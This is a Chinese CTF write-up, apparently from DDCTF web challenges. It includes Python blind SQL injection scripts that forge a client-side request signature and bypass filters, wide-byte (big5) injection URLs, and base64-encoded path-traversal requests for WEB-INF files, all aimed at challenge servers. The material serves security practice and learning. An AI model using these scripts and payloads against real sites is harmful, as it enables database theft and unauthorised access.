ctf是不可能的,这辈子都不可能的,只能写写签到这个样子
数据库的秘密
查看源代码js
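/**
 * Build the request signature for a form object.
 *
 * Every own/enumerable property of obj except "sign" is concatenated as
 * "name=value" (no separator), key is appended, and the result is passed to
 * hex_math_enc (defined in a separate script, not on this page). Property
 * order is the for-in enumeration order, so a verifier must assemble the
 * string the same way.
 *
 * NOTE(review): key is shipped to the browser together with this function,
 * so the signature only guards against accidental corruption of the form
 * fields; it cannot serve as a server-side integrity or authenticity check.
 *
 * @param {Object} obj form fields to sign
 * @param {string} key secret appended before hashing
 * @returns {*} the value returned by hex_math_enc
 */
function signGenerate(obj, key) {
  var str0 = '';
  // 'var' keeps the loop variable local; the original leaked i and str1 as globals.
  for (var i in obj) {
    if (i != 'sign') {
      str0 += i + '=' + obj[i];
    }
  }
  return hex_math_enc(str0 + key);
}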
// Form fields that get signed and submitted. All text fields start empty and
// are filled in by submitt(); time is the current Unix epoch in whole seconds.
var obj = {
  id: '',
  title: '',
  author: '',
  date: '',
  time: Math.floor(Date.now() / 1000)
};
/**
 * Copy the four text inputs into the global obj, sign it with the global key,
 * and submit queryForm with sig and time carried in the query string.
 */
function submitt() {
  var fields = ['id', 'title', 'author', 'date'];
  for (var k = 0; k < fields.length; k++) {
    obj[fields[k]] = document.getElementById(fields[k]).value;
  }
  var form = document.getElementById('queryForm');
  form.action = "index.php?sig=" + signGenerate(obj, key) + "&time=" + obj.time;
  form.submit();
}
key = 'adrefkfweodfsdpiru' // signing key, an implicit global read by submitt(); it is visible to every client that loads this script
发现有js加密,还有一个hidden参数,其他两个字符类型的参数都有防火墙,所以我们要从author参数注入,进行盲注
过滤了database()
手残党,js加密翻译到python翻不来,直接调用js的函数好了,具体操作查看execjs库的使用方法
# -*-coding:utf-8-*-
__author__ = 'Deen'
import requests
import execjs
import time
import urllib
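def get_js(path="./math.js"):
    """Return the complete text of the JavaScript helper file.

    Args:
        path: file to read; defaults to ./math.js in the working directory,
            which is what the original always read.

    Returns:
        The whole file as one string (empty string for an empty file).

    Raises:
        IOError/OSError: if the file cannot be opened.
    """
    # The context manager closes the handle even if read() raises; the
    # original readline loop never closed the file at all.
    with open(path, 'r') as handle:
        return handle.read()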
def js_encode(payload, time_str):
    """Reproduce the page's client-side signature for a form with empty id/title/date.

    The signed string is the same "name=value" concatenation signGenerate
    builds (id, title and date empty, author set to payload, time set to
    time_str) with the hard-coded key appended; hex_math_enc from math.js
    is then applied through execjs.

    Args:
        payload: value of the author field.
        time_str: Unix timestamp in seconds, as a string.

    Returns:
        Whatever hex_math_enc returns for the assembled string.
    """
    ctx = execjs.compile(get_js())
    key = 'adrefkfweodfsdpiru'
    signed = 'id=title=author=' + payload + 'date=time=' + time_str + key
    return ctx.call('hex_math_enc', signed)
def access(payload):
    """Send one signed search request and report whether the reply mentions 'admin'.

    payload is spliced into the author field; id, title and date are sent
    empty so the signed string matches what js_encode assembles.

    Args:
        payload: text appended to the author field.

    Returns:
        1 if 'admin' occurs in the response body, else 0.
    """
    url = "http://116.85.43.88:8080/EHZTYREPPGMCQLNB/dfe3ia/index.php?"
    urllib.unquote(payload)  # return value is discarded, so this statement has no effect
    data = {
        "id": "",
        "title": "",
        "date": "",
        "author":"admin'&&"+(payload)+"#",
        "button":"search",
    }
    time_str = str(int(time.time()))  # second-resolution timestamp, same granularity as the page's JS
    sign = js_encode(data['author'], time_str)
    proxies = {'http': "http://127.0.0.1:8080"}  # every request is routed through a local proxy on port 8080
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Forwarded-For": "123.232.23.245"
    }
    final_url = url + 'sig=' + sign + '&time=' + time_str
    response = requests.post(final_url, data=data, headers=headers, proxies=proxies)
    text = response.text
    if 'admin' in text :
        return 1
    else:
        return 0
def get_payload(i,w):
    """Return the boolean condition sent by the caller for offset i and candidate w.

    The active condition compares one character of the concatenated secvalue
    column with the code point of w. The commented-out assignments are the
    conditions used in the earlier enumeration steps (schema, table and
    column names) and are kept for reference only.

    Args:
        i: character offset passed to substr.
        w: single-character candidate.

    Returns:
        The condition string.
    """
    #payload = "ord(substr(((Select group_concat(table_name)fRom infOrmation_schema.tables wHere table_schema=database()))fRom " + str(i) + " fOr 1))=" + str(ord(w))+')'
    #payload = "((ord(substr((SELECT group_concat(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
    #payload = "((ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='ddctf')fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
    #payload = "((ord(substr((select group_concat(column_name) from information_schema.columns where table_name=0x6374665f6b657937)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
    payload = "((ord(substr((select group_concat(secvalue) from ctf_key7)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
    return payload
if __name__ == '__main__':
    # Candidate alphabet tried at each offset ('0' is listed twice; the duplicate only costs one extra request).
    dic = list("0qwertyuiopasdf{}ghjklzxcvbnm,1234567890_ABCDEFGHIJKLMNOPQRSTUVWXYZ=#$%^&*()-+!`")
    pw = ''
    for i in range(1, 40):  # one offset per outer iteration
        for w in dic:
            if access(urllib.unquote(get_payload(i, w))):
                num = ord(w)
                w = chr(num)  # ord/chr round trip leaves w unchanged
                pw += w
                print pw  # Python 2 print statement; shows the string recovered so far
                break  # first candidate that matches wins; move on to the next offset
数据库名:ddctf
表名:ctf_key7,message
列名:secvalue
flag:DDCTF{JQDCSEMLJCCPJRMO}
专属链接
下载WEB-INF/web.xml
http://116.85.48.102:5050//image/banner/Li4vLi4vV0VCLUlORi93ZWIueG1s
mvc-dispatcher-servlet.xml
http://116.85.48.102:5050//image/banner/Li4vLi4vV0VCLUlORi9tdmMtZGlzcGF0Y2hlci1zZXJ2bGV0LnhtbA==
靠太菜了...日不动
注入的奥妙
在页面源码发现是个big5编码提示宽字节注入,宽字节的要点就是把单引号前面的转义斜杠吞掉或者添加一个转义斜杠转义掉。
所以直接日吧,fuzz
http://116.85.48.105:5033/1f27eda8-1f66-46cd-bac5-3ada3eb7cb73/well/getmessage/%E9%Bb%a0'||%23
%E9%B1%8b'||1%23
%E9%B1%ad'||1%23
开始盲注,脚本如下
过滤了database(),还有大于小于号
# -*-coding:utf-8-*-
__author__ = 'Deen'
import requests
import time
import urllib
def access(payload):
    """Send one GET request with payload embedded in the path and report whether 'test' is in the reply.

    The payload is inserted between the fixed URL prefix and the ")%23"
    suffix; no other request parameters are sent.

    Args:
        payload: text placed inside the URL.

    Returns:
        1 if "test" occurs in the response body, else 0.
    """
    url = "http://116.85.48.105:5033/1f27eda8-1f66-46cd-bac5-3ada3eb7cb73/well/getmessage/%E9%B1%ad'||("
    proxies = {'http': "http://127.0.0.1:8080"}  # every request is routed through a local proxy on port 8080
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    full_url = url +payload+ ")%23"
    response = requests.get(full_url,headers=headers,proxies=proxies)
    text = response.text
    if "test" in text :
        return 1
    else:
        return 0
def get_payload(i,w):
    """Return the boolean condition sent by the caller for offset i and candidate w.

    The active condition compares one character of the concatenated action
    column of route_rules with the code point of w. The commented-out
    assignments are the conditions from the earlier enumeration steps; the
    trailing comments on them record what each step returned.

    Args:
        i: character offset passed to substr.
        w: single-character candidate.

    Returns:
        The condition string.
    """
    #payload = "ord(substr(((Select group_concat(table_name)fRom infOrmation_schema.tables wHere table_schema=database()))fRom " + str(i) + " fOr 1))=" + str(ord(w))+')'
    #payload = "((ord(substr((SELECT group_concat(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'# slqi
    #payload = "((ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x73716c69)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))' # message,route_rules,6d657373616765 726f7574655f72756c6573
    #payload = "((ord(substr((select group_concat(column_name) from information_schema.columns where table_name=0x6d657373616765)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))' #id,pattern,action,rulepass
    payload = "((ord(substr((select group_concat(action) from route_rules)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
    return payload
if __name__ == '__main__':
    # Candidate alphabet tried at each offset ('0' is listed twice; the duplicate only costs one extra request).
    dic = list("0qwertyuiopasdfghjklzxcvbnm,1234567890_ABCDEFGHIJKLMNOPQRSTUV{}WXYZ=#$%^&*()-+!`")
    pw = ''
    for i in range(30, 100):  # starts at offset 30 rather than 1, presumably resuming an earlier partial run
        for w in dic:
            if access(urllib.unquote(get_payload(i, w))):
                num = ord(w)
                w = chr(num)  # ord/chr round trip leaves w unchanged
                pw += w
                print pw  # Python 2 print statement; shows the string recovered so far
                break  # first candidate that matches wins; move on to the next offset
数据库里没找到flag,有个route表,估计又是找路径的什么鬼,无聊太菜了,不想日了
想起来写过某个针对这种盲注的菜鸡脚本,稍微改改就能用了
github地址,比较粗糙,求大佬轻喷:https://github.com/deenrookie/fff-sqli